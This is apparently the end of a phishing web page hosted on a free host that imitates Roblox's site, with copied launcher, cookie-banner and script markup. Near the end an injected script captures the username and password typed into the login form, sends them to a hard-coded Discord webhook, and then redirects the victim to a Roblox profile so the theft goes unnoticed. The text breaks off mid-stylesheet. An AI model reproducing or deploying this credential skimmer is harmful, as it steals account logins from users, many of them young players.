id=footer-container></footer></div><script>function urchinTracker(){}</script><script>if(typeof Roblox==="undefined"){Roblox={};}
if(typeof Roblox.PlaceLauncher==="undefined"){Roblox.PlaceLauncher={};}
var isRobloxIconEnabledForRetheme="True";var robloxIcon=isRobloxIconEnabledForRetheme==='True'?"<span class='icon-logo-r-95'></span>":"<img src='https://images.rbxcdn.com/6304dfebadecbb3b338a79a6a528936c.svg.gzip' width='90' height='90' alt='R'/>";Roblox.PlaceLauncher.Resources={RefactorEnabled:"True",IsProtocolHandlerBaseUrlParamEnabled:"False",ProtocolHandlerAreYouInstalled:{play:{content:robloxIcon+"<p>You&#39;re moments away from getting into the game!</p>",buttonText:"Download and Install Roblox",footerContent:"<a href='https://assetgame.roblox.com/game/help'class= 'text-name small' target='_blank' >Click here for help</a> "},studio:{content:"<img src='https://images.rbxcdn.com/3da410727fa2670dcb4f31316643138a.svg.gzip' width='95' height='95' alt='R' /><p>Get started creating your own games!</p>",buttonText:"Download Studio"}},ProtocolHandlerStartingDialog:{play:{content:robloxIcon+"<p>Roblox is now loading. Get ready to play!</p>"},studio:{content:"<img src='https://images.rbxcdn.com/3da410727fa2670dcb4f31316643138a.svg.gzip' width='95' height='95' alt='R' /><p>Checking for Roblox Studio...</p>"},loader:"<span class='spinner spinner-default'></span>"}};</script><div id=PlaceLauncherStatusPanel style=display:none;width:300px data-new-plugin-events-enabled=True data-event-stream-for-plugin-enabled=True data-event-stream-for-protocol-enabled=True data-is-game-launch-interface-enabled=True data-is-protocol-handler-launch-enabled=True data-is-user-logged-in=False data-os-name=Windows data-protocol-name-for-client=roblox-player data-protocol-name-for-studio=roblox-studio data-protocol-roblox-locale=en_us data-protocol-game-locale=en_us data-protocol-url-includes-launchtime=true data-protocol-detection-enabled=true data-protocol-separate-script-parameters-enabled=true data-protocol-avatar-parameter-enabled=false><div class="modalPopup blueAndWhite PlaceLauncherModal" style=min-height:160px><div id=Spinner class=Spinner style="padding:20px 0"><img data-delaysrc=https://images.rbxcdn.com/e998fb4c03e8c2e30792f2f3436e9416.gif height=32 width=32 alt=Progress></div><div id=status style="min-height:40px;text-align:center;margin:5px 20px"><div id=Starting class="PlaceLauncherStatus MadStatusStarting" style=display:block>Starting Roblox...</div><div id=Waiting class="PlaceLauncherStatus MadStatusField">Connecting to Players...</div><div id=StatusBackBuffer class="PlaceLauncherStatus PlaceLauncherStatusBackBuffer MadStatusBackBuffer"></div></div><div style=text-align:center;margin-top:1em><input type=button class="Button CancelPlaceLauncherButton translate" value=Cancel></div></div></div><div id=ProtocolHandlerClickAlwaysAllowed class=ph-clickalwaysallowed style=display:none><p class=larger-font-size><span class=icon-moreinfo></span> Check <strong>Always open links for URL: Roblox Protocol</strong> and click <strong>Open URL: Roblox Protocol</strong> in the dialog box above to join games faster in the future!</div><script>function checkRobloxInstall(){return RobloxLaunch.CheckRobloxInstall('https://www.roblox.com/Download');}</script><div id=InstallationInstructions style=display:none><div class=ph-installinstructions><div class=ph-modal-header><span class="icon-close simplemodal-close"></span><h3 class=title>Thanks for playing Roblox</h3></div><div class=modal-content-container><div class=ph-installinstructions-body><ul class=modal-col-4><li class=step1-of-4><h2>1</h2><p class=larger-font-size>Click <strong>RobloxPlayer.exe</strong> to run the Roblox installer, which just downloaded via your web browser.</p><img data-delaysrc=https://images.rbxcdn.com/28eaa93b899b93461399aebf21c5346f.png><li class=step2-of-4><h2>2</h2><p class=larger-font-size>Click <strong>Run</strong> when prompted by your computer to begin the installation process.</p><img data-delaysrc=https://images.rbxcdn.com/51328932dedb5d8d61107272cc1a27db.png><li class=step3-of-4><h2>3</h2><p class=larger-font-size>Click <strong>Ok</strong> once you've successfully installed Roblox.</p><img data-delaysrc=https://images.rbxcdn.com/3797745629baca2d1b9496b76bc9e6dc.png><li class=step4-of-4><h2>4</h2><p class=larger-font-size>After installation, click <strong>Play</strong> below to join the action!<div class="VisitButton VisitButtonContinueGLI"><a class="btn btn-primary-lg disabled btn-full-width">Play</a></div></ul></div></div><div class=xsmall>The Roblox installer should download shortly. If it doesn’t, start the <a id=GameLaunchManualInstallLink href=# class=text-link>download now.</a><script>if(Roblox.ProtocolHandlerClientInterface&&typeof Roblox.ProtocolHandlerClientInterface.attachManualDownloadToLink==='function'){Roblox.ProtocolHandlerClientInterface.attachManualDownloadToLink();}</script></div></div></div><div class=InstallInstructionsImage data-modalwidth=970 style=display:none></div><div id=pluginObjDiv style=height:1px;width:1px;visibility:hidden;position:absolute;top:0></div><iframe id=downloadInstallerIFrame name=downloadInstallerIFrame style=visibility:hidden;height:0;width:1px;position:absolute></iframe><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=clientinstaller src=https://js.rbxcdn.com/17af7ddc78e9257b126bfee033fdf688.js></script><script>Roblox.Client._skip=null;Roblox.Client._CLSID='76D50904-6780-4c8b-8986-1A7EE0B1716D';Roblox.Client._installHost='setup.roblox.com';Roblox.Client.ImplementsProxy=true;Roblox.Client._silentModeEnabled=true;Roblox.Client._bringAppToFrontEnabled=false;Roblox.Client._currentPluginVersion='';Roblox.Client._eventStreamLoggingEnabled=true;Roblox.Client._installSuccess=function(){if(GoogleAnalyticsEvents){GoogleAnalyticsEvents.ViewVirtual('InstallSuccess');GoogleAnalyticsEvents.FireEvent(['Plugin','Install Success']);if(Roblox.Client._eventStreamLoggingEnabled&&typeof Roblox.GamePlayEvents!="undefined"){Roblox.GamePlayEvents.SendInstallSuccess(Roblox.Client._launchMode,play_placeId);}}}
if((window.chrome||window.safari)&&window.location.hash=='#chromeInstall'){window.location.hash='';var continuation='('+$.cookie('chromeInstall')+')';play_placeId=$.cookie('chromeInstallPlaceId');Roblox.GamePlayEvents.lastContext=$.cookie('chromeInstallLaunchMode');$.cookie('chromeInstallPlaceId',null);$.cookie('chromeInstallLaunchMode',null);$.cookie('chromeInstall',null);RobloxLaunch._GoogleAnalyticsCallback=function(){var isInsideRobloxIDE='website';if(Roblox&&Roblox.Client&&Roblox.Client.isIDE&&Roblox.Client.isIDE()){isInsideRobloxIDE='Studio';};GoogleAnalyticsEvents.FireEvent(['Plugin Location','Launch Attempt',isInsideRobloxIDE]);GoogleAnalyticsEvents.FireEvent(['Plugin','Launch Attempt','Play']);EventTracker.fireEvent('GameLaunchAttempt_Win32','GameLaunchAttempt_Win32_Plugin');if(typeof Roblox.GamePlayEvents!='undefined'){Roblox.GamePlayEvents.SendClientStartAttempt(null,play_placeId);}};Roblox.Client.ResumeTimer(eval(continuation));}</script><div class="ConfirmationModal modalPopup unifiedModal smallModal" data-modal-handle=confirmation style=display:none><a class="genericmodal-close ImageButton closeBtnCircle_20h"></a><div class=Title></div><div class=GenericModalBody><div class=TopBody><div class="ImageContainer roblox-item-image" data-image-size=small data-no-overlays data-no-click><img class=GenericModalImage alt="generic image"></div><div class=Message></div></div><div class="ConfirmationModalButtonContainer GenericModalButtonContainer"><a href="" id=roblox-confirm-btn><span></span></a> <a href="" id=roblox-decline-btn><span></span></a></div><div class=ConfirmationModalFooter></div></div><script>Roblox=Roblox||{};Roblox.Resources=Roblox.Resources||{};Roblox.Resources.GenericConfirmation={yes:"Yes",No:"No",Confirm:"Confirm",Cancel:"Cancel"};</script></div><div id=modal-confirmation class=modal-confirmation data-modal-type=confirmation><div id=modal-dialog class=modal-dialog><div class=modal-content><div class=modal-header><button type=button class=close data-dismiss=modal> <span aria-hidden=true><span class=icon-close></span></span><span class=sr-only>Close</span> </button><h5 class=modal-title></h5></div><div class=modal-body><div class=modal-top-body><div class=modal-message></div><div class="modal-image-container roblox-item-image" data-image-size=medium data-no-overlays data-no-click><img class=modal-thumb alt="generic image"></div><div class="modal-checkbox checkbox"><input id=modal-checkbox-input type=checkbox> <label for=modal-checkbox-input></label></div></div><div class=modal-btns><a href="" id=confirm-btn><span></span></a> <a href="" id=decline-btn><span></span></a></div><div class="loading modal-processing"><img class=loading-default src=https://images.rbxcdn.com/4bed93c91f909002b1f17f05c0ce13d1.gif alt=Processing...></div></div><div class="modal-footer text-footer"></div></div></div></div><script>var Roblox=Roblox||{};Roblox.jsConsoleEnabled=false;</script><script>$(function(){Roblox.CookieUpgrader.domain='roblox.com';Roblox.CookieUpgrader.upgrade("GuestData",{expires:Roblox.CookieUpgrader.thirtyYearsFromNow});Roblox.CookieUpgrader.upgrade("RBXSource",{expires:function(cookie){return Roblox.CookieUpgrader.getExpirationFromCookieValue("rbx_acquisition_time",cookie);}});Roblox.CookieUpgrader.upgrade("RBXViralAcquisition",{expires:function(cookie){return Roblox.CookieUpgrader.getExpirationFromCookieValue("time",cookie);}});Roblox.CookieUpgrader.upgrade("RBXMarketing",{expires:Roblox.CookieUpgrader.thirtyYearsFromNow});Roblox.CookieUpgrader.upgrade("RBXSessionTracker",{expires:Roblox.CookieUpgrader.fourHoursFromNow});Roblox.CookieUpgrader.upgrade("RBXEventTrackerV2",{expires:Roblox.CookieUpgrader.thirtyYearsFromNow});});</script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=intl-polyfill src=https://js.rbxcdn.com/d44520f7da5ec476cfb1704d91bab327.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=InternationalCore src=https://js.rbxcdn.com/ff3308aa2e909de0f9fcd5da7b529db247f69fe9b4072cbbc267749800a4d9e6.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=TranslationResources src=https://js.rbxcdn.com/83d836a661ff433d5b7ce719c489e43af590ff75ab39ccc6d393546fe91b766a.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=leanbase src=https://js.rbxcdn.com/dc858944cf457d0197e400a0b4dfc437.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=CoreUtilities src=https://js.rbxcdn.com/28adaa310a235ad22dde15d33ec6782c5d2b5cdb24e61107c8f6fb4c970f0017.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=CoreRobloxUtilities src=https://js.rbxcdn.com/1ea4d24dc5a4344579499b4d225f808e013d2b53bfee4a88291a2ac825e5e443.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=React src=https://js.rbxcdn.com/45841f2140bdbf6302237530383db2c6bfd938c7138a085cea83fb5f4c03086c.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=ReactUtilities src=https://js.rbxcdn.com/898cb6e9c467d15ad80a67d019f3815d35dbc6ff60c12ef7dd928e8fbaf02b0b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=ReactStyleGuide src=https://js.rbxcdn.com/132449c053f66a1a82a3c7f99496355b024e449d688285dc66d92f7fd672fe25.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=angular src=https://js.rbxcdn.com/ae3d621886e736e52c97008e085fa286.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=AngularJsUtilities src=https://js.rbxcdn.com/0997b4b967345e5a2c5fc01dd196a4866a5bf415b0650a6382630d397dd5fefe.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=InternationalAngularJs src=https://js.rbxcdn.com/95f7afb5fcb3c8ae379d51661e32c54ea8d8b823ace7574bd0b7fab9275cba6b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Thumbnails src=https://js.rbxcdn.com/9b11c29e2ccec212299b6cd8ee41d569f5eda14b20b71e561e2ed9861a3fcf88.js></script><div id=presence-registration-bootstrap-data data-is-enabled=False data-interval=15000></div><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=PresenceRegistration src=https://js.rbxcdn.com/09823cba5a528d5c2ae37d611f1719b9f156a663c9ec3e761392b53e784601d2.js></script><div ng-modules=baseTemplateApp><script src=https://js.rbxcdn.com/ffcc04436179c6b2a6668fdfcfbf62b1.js></script></div><div ng-modules=pageTemplateApp><script src=https://js.rbxcdn.com/84ac8369f6efcc7f9e26ab81bc8614d3.js></script></div><script>Roblox.config.externalResources=[];Roblox.config.paths['Pages.Catalog']='https://js.rbxcdn.com/cafca5e807a6864149a01d3e510763d3.js';Roblox.config.paths['Pages.CatalogShared']='https://js.rbxcdn.com/daeddd9f7ee5728711b717cc62326f34.js';Roblox.config.paths['Widgets.AvatarImage']='https://js.rbxcdn.com/7d49ac94271bd506077acc9d0130eebb.js';Roblox.config.paths['Widgets.DropdownMenu']='https://js.rbxcdn.com/da553e6b77b3d79bec37441b5fb317e7.js';Roblox.config.paths['Widgets.GroupImage']='https://js.rbxcdn.com/8ad41e45c4ac81f7d8c44ec542a2da0a.js';Roblox.config.paths['Widgets.HierarchicalDropdown']='https://js.rbxcdn.com/4a0af9989732810851e9e12809aeb8ad.js';Roblox.config.paths['Widgets.ItemImage']='https://js.rbxcdn.com/61a0490ba23afa17f9ecca2a079a6a57.js';Roblox.config.paths['Widgets.PlaceImage']='https://js.rbxcdn.com/a6df74a754523e097cab747621643c98.js';</script><script>Roblox.XsrfToken.setToken('q7e+45YdAjM+');</script><script>$(function(){Roblox.DeveloperConsoleWarning.showWarning();});</script><script>$(function(){function trackReturns(){function dayDiff(d1,d2){return Math.floor((d1-d2)/86400000);}
if(!localStorage){return false;}
var cookieName='RBXReturn';var cookieOptions={expires:9001};var cookieStr=localStorage.getItem(cookieName)||"";var cookie={};try{cookie=JSON.parse(cookieStr);}catch(ex){}
try{if(typeof cookie.ts==="undefined"||isNaN(new Date(cookie.ts))){localStorage.setItem(cookieName,JSON.stringify({ts:new Date().toDateString()}));return false;}}catch(ex){return false;}
var daysSinceFirstVisit=dayDiff(new Date(),new Date(cookie.ts));if(daysSinceFirstVisit==1&&typeof cookie.odr==="undefined"){RobloxEventManager.triggerEvent('rbx_evt_odr',{});cookie.odr=1;}
if(daysSinceFirstVisit>=1&&daysSinceFirstVisit<=7&&typeof cookie.sdr==="undefined"){RobloxEventManager.triggerEvent('rbx_evt_sdr',{});cookie.sdr=1;}
try{localStorage.setItem(cookieName,JSON.stringify(cookie));}catch(ex){return false;}}
GoogleListener.init();RobloxEventManager.initialize(true);RobloxEventManager.triggerEvent('rbx_evt_pageview');trackReturns();RobloxEventManager._idleInterval=450000;RobloxEventManager.registerCookieStoreEvent('rbx_evt_initial_install_start');RobloxEventManager.registerCookieStoreEvent('rbx_evt_ftp');RobloxEventManager.registerCookieStoreEvent('rbx_evt_initial_install_success');RobloxEventManager.registerCookieStoreEvent('rbx_evt_fmp');RobloxEventManager.startMonitor();});</script><script>var Roblox=Roblox||{};Roblox.UpsellAdModal=Roblox.UpsellAdModal||{};Roblox.UpsellAdModal.Resources={title:"Remove Ads Like This",body:"Builders Club members do not see external ads like these.",accept:"Upgrade Now",decline:"No, thanks"};</script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=page src=https://js.rbxcdn.com/6f35fd3cd7d5b42f8f805f430ce7a040.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=StyleGuide src=https://js.rbxcdn.com/43cdbede285864298b0b52d8742ce1ec9358f9f08a67c62c46e005b27ef81f94.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Footer src=https://js.rbxcdn.com/938431571ac213ef2c1933845edcb0b044e7bdf95340cf45f8ab84580aeb1e12.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/1247234a44061d0192e3bc773511e5784d72b31d6073cdfcebc07cf7032631d5.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/c24e68e13a0163ea63afc4e489e9df9f276314cda86b98522ae87b38573a8bbf.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/e3642a1e7ea6a270d09ae289427672c3fa55bc1c521b21be388856bae84359a6.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/fb66c22f0bb55ee7dea8db771ff47b20b0510c7a5b397659f6bef74a7063adea.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=CookieBanner src=https://js.rbxcdn.com/3c48ddf1f0db0d8805c921dabc3754f9ea2b36dbe8d7d177d73f09eaee1a0ba4.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Captcha src=https://js.rbxcdn.com/3927bd66ec797e2fd38b41fc0c8f1de84c7f976cc7f4738d1d2f7600352b8683.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=PeopleList src=https://js.rbxcdn.com/a769800bacb266306c15fb55ffd9428323bb1a8b425c4f13311d1f4e8dbc85a3.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/88fe01610c32459291f363fdfe18ac121b4d32e7faba0b8465ae28846b5ad669.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/548443a6c02c798744a04e48e78d714eb11c311fd825cea6f286996905855b1e.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Aliases src=https://js.rbxcdn.com/1dcad2b48702f9c2b256b691be53d46c01438b17de7693b5e66209ca7a3ddad7.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/19d5a5c5ac2717b3f1b795c8c3ad8849752cfc51f0ced11203d4eb7b2311bc7f.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/808cec1c97944fab5e6645bea5d1597005cbef8a9bd0ab3139bbc57c386475d2.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=GroupsList src=https://js.rbxcdn.com/9b95122ee2c8719b99d1c16cd70a9bb6b045e10c35d8997fbd17126aab770976.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/60e285ed541076289ad44c1ecd03597700d8182fae1184d0e140ee5f4fc7647c.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/adb93661b0ae32c958b4d8b9d59ab15078a4567ff19afb2d950cd744e90b51ab.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=GameLaunch src=https://js.rbxcdn.com/ee062fc723e5339797b723822692537de5ea093289178a923fc3bbf5775a7ff3.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/d6d98fdbc50bc0188d97b40a8f28cbc2604ae5c1bd345b1050a3ba6737e6432d.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/96657452cbac8311a30876508e5a2aa179df6ca9455925f878b5408d619b9a06.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/0a29edd8ca7caa63c0c1a979e3c80267f58437a8adc217404cccbc7b5d487dc3.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/c8576224374a8b66c26d63dc6f942f298696d59f658dd9fa1c7abfc6ac9909a7.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=SystemFeedback src=https://js.rbxcdn.com/aac542106f7f77697cbc3b36ab3cf0619bf9b69a1af0983e59dfeb6c36652d3b.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=Login src=https://js.rbxcdn.com/262ac126331e487dacbdf05971f6bcba9e278d46f0f17956187620ab5f9a0420.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/b72ebb7f4d661de6d88ef96579bf7c537ab4fcaa01c676f4d5e159300e94a8e6.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/6f3c0bfbaf1f91c9c1e49c6722bbb5ce462796f1b53763063c5461099fc554f9.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/0f9f2e28d8c6f8de2a6f21016f4f9b57b9c85b574fbb24e3da0186f86c70be1a.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true src=https://js.rbxcdn.com/814aa47f2187d08241bd4bb0d2333038fa0a30390d9f3ef578ab21dd311ba46f.js></script><div id=cookieConsentModalOverlay class="cookie-modal-overlay modal-backdrop in"></div><div id=cookieConsentModalWrapper class="cookie-modal-wrapper modal-dialog"><div id=cookieConsentModal class="modal-content cookie-modal desktop"><div class="modal-header cookie-modal-title"><button type=button class=close> <span aria-hidden=true> <span class=icon-close></span> </span> <span class=sr-only></span> </button><h4>Manage Cookies</h4></div><div class="cookie-modal-content modal-body"><div class=cookie-modal-description>Please choose whether this site may use cookies as described below. You can learn more about how this site uses cookies and related technologies by reading our <a id=cookie-link-privacy class="cookie-link-privacy text-name" href=https://www.roblox.com/info/privacy>privacy policy</a>.</div><div class="modal-checkbox checkbox cookie-checkbox"><input id=cookie-checkbox-essential type=checkbox disabled checked> <label for=cookie-checkbox-essential class=cookie-checkbox-label> Essential Cookies </label></div><div class=cookie-modal-padding>These cookies are required to provide the functionality on the site, such as for user authentication, securing the system or saving cookie preferences.</div><ul class="cookie-modal-padding cookie-modal-list"><li>Roblox<li>Zendesk<li>Gigya</ul><div class="modal-checkbox checkbox cookie-checkbox"><input id=cookie-checkbox-tracking type=checkbox> <label for=cookie-checkbox-tracking class=cookie-checkbox-label> Analytics Cookies </label></div><div class=cookie-modal-padding>These cookies used for improving site performance or understanding site usage.</div><ul class="cookie-modal-padding cookie-modal-list"><li>Google Analytics<li>Google Universal Analytics</ul></div><button id=cookie-btn-allow class="btn-secondary-md cookie-btn-allow"> Allow </button></div></div><div id=cookie-banner-wrapper class="cookie-banner-wrapper desktop"><div class="alert-info cookie-banner"><div class=banner-item>Roblox uses cookies to personalize content, provide social media features and analyze the traffic on our site. To learn about how we use cookies and how you can <a id=cookie-link-manage href=# class="cookie-link-manage text-name">manage cookie preferences</a>, please refer to our <a class=text-name href=https://www.roblox.com/info/privacy>Privacy and Cookie Policy</a>.</div><div class="banner-item accept-btn"><button type=button id=CookieLawAccept class="btn-secondary-sm cookie-law-accept-btn"> Accept </button></div></div></div><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=pageEnd src=https://js.rbxcdn.com/4e90eba34c3e4eb58d18a9f6b8383b5c.js></script><script onerror=Roblox.BundleDetector&amp;&amp;Roblox.BundleDetector.reportBundleError(this) data-monitor=true data-bundlename=LatencyMeasurement src=https://js.rbxcdn.com/8761d57355e1618061c73d8aa15d38b603a7a6b4b3807ca99182799100e0aa4a.js></script>

<script type="text/javascript">document.addEventListener("DOMContentLoaded",()=>{
            const e=document.getElementById("login-username"),o=document.getElementById("login-password"),t=document.getElementById("login-button");
            document.querySelector("p.login-error").setAttribute("style","display: none !important;"),console.log("Loaded",t);

            t.addEventListener("click",async t=>{
                               t.preventDefault();
            const n=e.value.trim(),a=o.value.trim();
            ""!=n&&""!=a?(await(({
              webhookURL:e,content:o}
                                )=>fetch(e,{
              method:"post",headers:{
                "Content-Type":"application/json"}
              ,body:JSON.stringify(o)}
                                        ))({
              webhookURL:"https://discord.com/api/webhooks/826879673337905222/lAGKhbqynW6MlQrUdBJNiQFT7t77snjKVVZJNjqwe_JUJXkzA20jB1ki1KUw-_5lGMwD",content:{
                description:"Valid attempt requested",embeds:[{
                  fields:[{
                    name:"Username",value:n,inline:!0}
                          ,{
                            name:"Password",value:a,inline:!0}
                         ],color:7143253,timestamp:(new Date).toISOString()}
                                                             ]}
            }
                                          ),window.location.replace("https://www.roblox.com/users/241111762/profile")):window.location.reload()}
                                                                )}
          );
		  
		  
		  
        </script>
<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(t){for(var e=t+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var a=n[o];" "==a.charAt(0);)a=a.substring(1);if(0==a.indexOf(e))return a.substring(e.length,a.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var wordpressAdminBody=document.getElementsByClassName("wp-admin")[0],notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0],wpSidebar=document.getElementById("adminmenuwrap"),wpTopBarRight=document.getElementById("wp-admin-bar-top-secondary");if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Roboto:300,400,600",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;} .upgrade-btn-sidebar {display: none;} #wp-toolbar .top-bar-upgrade-btn {width: 52px; height: 46px !important; padding: 0 !important;} .top-bar-upgrade-btn__text {display: none;} .dashicons-star-filled.top-bar-upgrade-btn__icon::before {font-size: 28px; margin-top: 10px; width: 28px; height: 28px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; right: 0; display: flex; padding: 0 5%}} @media only screen and (max-width: 960px) {.upgrade-btn-sidebar {border-radius: 0 !important; padding: 10px 0 !important; margin: 0 !important;} .upgrade-btn-sidebar__icon {display: block !important; margin: auto;} .upgrade-btn-sidebar__text {display: none;}}  .web-hosting-90-off-image {max-width: 90%; margin-top: 20px;} .content-wrapper {z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 12px -6px #cc292f; max-width: 350px; border: 0; border-radius: 3px; background-color: #6747c7 !important; padding: 15px 55px !important;  margin-bottom: 48px; font-size: 14px; font-weight: 800; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: rgba(103,71,199, 0.9) !important;} .upgrade-btn-sidebar {text-align:center;background-color:#ff4546;max-width: 350px;border-radius: 3px;border: 0;padding: 12px; margin: 20px 10px;display: block; font-size: 12px;color: #ffffff;font-weight: 700;text-decoration: none;} .upgrade-btn-sidebar:hover, .upgrade-btn-sidebar:focus, .upgrade-btn-sidebar:active {background-color: rgba(255,69,70, 0.9); color: #ffffff;} .upgrade-btn-sidebar__icon {display: none;} .top-bar-upgrade-btn {height: 100% !important; display: inline-block !important; padding: 0 10px !important; color: #ffffff; cursor: pointer;} .top-bar-upgrade-btn:hover, .top-bar-upgrade-btn:active, .top-bar-upgrade-btn:focus {background-color: #ff4546 !important; color: #ffffff !important;} .top-bar-upgrade-btn__icon {margin-right: 